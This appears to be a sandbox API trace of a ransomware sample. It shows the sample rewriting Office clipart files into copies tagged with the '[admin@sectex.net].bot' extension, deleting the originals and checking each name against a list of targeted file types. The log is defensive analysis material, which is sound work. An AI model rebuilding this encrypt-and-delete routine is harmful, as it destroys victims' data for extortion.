	[0163.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107712.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.051] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4636) returned 1
	[0163.051] CloseHandle (hObject=0x1b4) returned 1
	[0163.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107712.wmf")) returned 0x20
	[0163.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107712.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107712.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.051] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.051] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107712.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.052] GetLastError () returned 0x0
	[0163.052] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x121c, lpOverlapped=0x0) returned 1
	[0163.054] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1220, lpOverlapped=0x0) returned 1
	[0163.055] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.055] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.055] SetEndOfFile (hFile=0x37c) returned 1
	[0163.055] CloseHandle (hObject=0x37c) returned 1
	[0163.055] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.055] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.057] CloseHandle (hObject=0x1b4) returned 1
	[0163.058] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.058] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107712.wmf")) returned 1
	[0163.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.059] lstrlenW (lpString=".doc") returned 4
	[0163.059] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.059] lstrlenW (lpString=".docx") returned 5
	[0163.059] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0163.059] lstrlenW (lpString=".pdf") returned 4
	[0163.059] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.059] lstrlenW (lpString=".xls") returned 4
	[0163.059] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.059] lstrlenW (lpString=".xlsx") returned 5
	[0163.059] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0163.059] lstrlenW (lpString=".ppt") returned 4
	[0163.059] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.059] lstrlenW (lpString=".zip") returned 4
	[0163.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.059] lstrlenW (lpString=".rar") returned 4
	[0163.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.059] lstrlenW (lpString=".bz2") returned 4
	[0163.059] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.059] lstrlenW (lpString=".7z") returned 3
	[0163.059] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.059] lstrlenW (lpString=".dbf") returned 4
	[0163.059] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.059] lstrlenW (lpString=".1cd") returned 4
	[0163.059] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.059] lstrlenW (lpString=".jpg") returned 4
	[0163.059] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.060] lstrlenW (lpString=".doc") returned 4
	[0163.060] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.060] lstrlenW (lpString=".docx") returned 5
	[0163.060] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0163.060] lstrlenW (lpString=".pdf") returned 4
	[0163.060] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.060] lstrlenW (lpString=".xls") returned 4
	[0163.060] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.060] lstrlenW (lpString=".xlsx") returned 5
	[0163.060] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0163.060] lstrlenW (lpString=".ppt") returned 4
	[0163.060] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.060] lstrlenW (lpString=".zip") returned 4
	[0163.060] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.060] lstrlenW (lpString=".rar") returned 4
	[0163.060] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.060] lstrlenW (lpString=".bz2") returned 4
	[0163.060] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.060] lstrlenW (lpString=".7z") returned 3
	[0163.060] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.060] lstrlenW (lpString=".dbf") returned 4
	[0163.060] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.060] lstrlenW (lpString=".1cd") returned 4
	[0163.060] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.060] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF") returned 63
	[0163.060] lstrlenW (lpString=".jpg") returned 4
	[0163.060] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.061] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.061] lstrlenW (lpString="J0107718.WMF") returned 12
	[0163.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107718.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.061] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3800) returned 1
	[0163.061] CloseHandle (hObject=0x1b4) returned 1
	[0163.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107718.wmf")) returned 0x20
	[0163.061] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107718.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107718.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.062] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.062] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107718.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.062] GetLastError () returned 0x0
	[0163.063] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xed8, lpOverlapped=0x0) returned 1
	[0163.064] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xee0, lpOverlapped=0x0) returned 1
	[0163.065] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.065] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.065] SetEndOfFile (hFile=0x37c) returned 1
	[0163.065] CloseHandle (hObject=0x37c) returned 1
	[0163.065] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.065] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.067] CloseHandle (hObject=0x1b4) returned 1
	[0163.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107718.wmf")) returned 1
	[0163.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.068] lstrlenW (lpString=".doc") returned 4
	[0163.068] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.068] lstrlenW (lpString=".docx") returned 5
	[0163.068] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.068] lstrlenW (lpString=".pdf") returned 4
	[0163.068] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.068] lstrlenW (lpString=".xls") returned 4
	[0163.068] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.068] lstrlenW (lpString=".xlsx") returned 5
	[0163.068] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.068] lstrlenW (lpString=".ppt") returned 4
	[0163.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.069] lstrlenW (lpString=".zip") returned 4
	[0163.069] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.069] lstrlenW (lpString=".rar") returned 4
	[0163.069] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.069] lstrlenW (lpString=".bz2") returned 4
	[0163.069] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.069] lstrlenW (lpString=".7z") returned 3
	[0163.069] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.069] lstrlenW (lpString=".dbf") returned 4
	[0163.069] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.069] lstrlenW (lpString=".1cd") returned 4
	[0163.069] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.069] lstrlenW (lpString=".jpg") returned 4
	[0163.069] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.069] lstrlenW (lpString=".doc") returned 4
	[0163.069] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.069] lstrlenW (lpString=".docx") returned 5
	[0163.069] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.069] lstrlenW (lpString=".pdf") returned 4
	[0163.069] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.069] lstrlenW (lpString=".xls") returned 4
	[0163.069] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.069] lstrlenW (lpString=".xlsx") returned 5
	[0163.069] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.069] lstrlenW (lpString=".ppt") returned 4
	[0163.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.070] lstrlenW (lpString=".zip") returned 4
	[0163.070] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.070] lstrlenW (lpString=".rar") returned 4
	[0163.070] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.070] lstrlenW (lpString=".bz2") returned 4
	[0163.070] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.070] lstrlenW (lpString=".7z") returned 3
	[0163.070] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.070] lstrlenW (lpString=".dbf") returned 4
	[0163.070] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.070] lstrlenW (lpString=".1cd") returned 4
	[0163.070] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned 63
	[0163.070] lstrlenW (lpString=".jpg") returned 4
	[0163.070] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.070] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.070] lstrlenW (lpString="J0107722.WMF") returned 12
	[0163.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107722.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.071] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=8260) returned 1
	[0163.071] CloseHandle (hObject=0x1b4) returned 1
	[0163.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107722.wmf")) returned 0x20
	[0163.071] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107722.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107722.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.071] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.071] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107722.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.072] GetLastError () returned 0x0
	[0163.072] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2044, lpOverlapped=0x0) returned 1
	[0163.074] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2050, lpOverlapped=0x0) returned 1
	[0163.075] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.075] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.075] SetEndOfFile (hFile=0x37c) returned 1
	[0163.075] CloseHandle (hObject=0x37c) returned 1
	[0163.075] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.075] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.077] CloseHandle (hObject=0x1b4) returned 1
	[0163.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.077] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107722.wmf")) returned 1
	[0163.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.078] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.078] lstrlenW (lpString=".doc") returned 4
	[0163.078] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.078] lstrlenW (lpString=".docx") returned 5
	[0163.078] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0163.078] lstrlenW (lpString=".pdf") returned 4
	[0163.078] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.078] lstrlenW (lpString=".xls") returned 4
	[0163.078] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.079] lstrlenW (lpString=".xlsx") returned 5
	[0163.079] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0163.079] lstrlenW (lpString=".ppt") returned 4
	[0163.079] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.079] lstrlenW (lpString=".zip") returned 4
	[0163.079] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.079] lstrlenW (lpString=".rar") returned 4
	[0163.079] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.079] lstrlenW (lpString=".bz2") returned 4
	[0163.079] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.079] lstrlenW (lpString=".7z") returned 3
	[0163.079] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.079] lstrlenW (lpString=".dbf") returned 4
	[0163.079] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.079] lstrlenW (lpString=".1cd") returned 4
	[0163.079] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.079] lstrlenW (lpString=".jpg") returned 4
	[0163.079] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.079] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.079] lstrlenW (lpString=".doc") returned 4
	[0163.079] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.079] lstrlenW (lpString=".docx") returned 5
	[0163.079] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0163.079] lstrlenW (lpString=".pdf") returned 4
	[0163.079] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.079] lstrlenW (lpString=".xls") returned 4
	[0163.079] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.079] lstrlenW (lpString=".xlsx") returned 5
	[0163.079] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0163.080] lstrlenW (lpString=".ppt") returned 4
	[0163.080] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.080] lstrlenW (lpString=".zip") returned 4
	[0163.080] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.080] lstrlenW (lpString=".rar") returned 4
	[0163.080] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.080] lstrlenW (lpString=".bz2") returned 4
	[0163.080] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.080] lstrlenW (lpString=".7z") returned 3
	[0163.080] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.080] lstrlenW (lpString=".dbf") returned 4
	[0163.080] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.080] lstrlenW (lpString=".1cd") returned 4
	[0163.080] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned 63
	[0163.080] lstrlenW (lpString=".jpg") returned 4
	[0163.080] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.080] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.080] lstrlenW (lpString="J0107724.WMF") returned 12
	[0163.080] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107724.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.081] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7016) returned 1
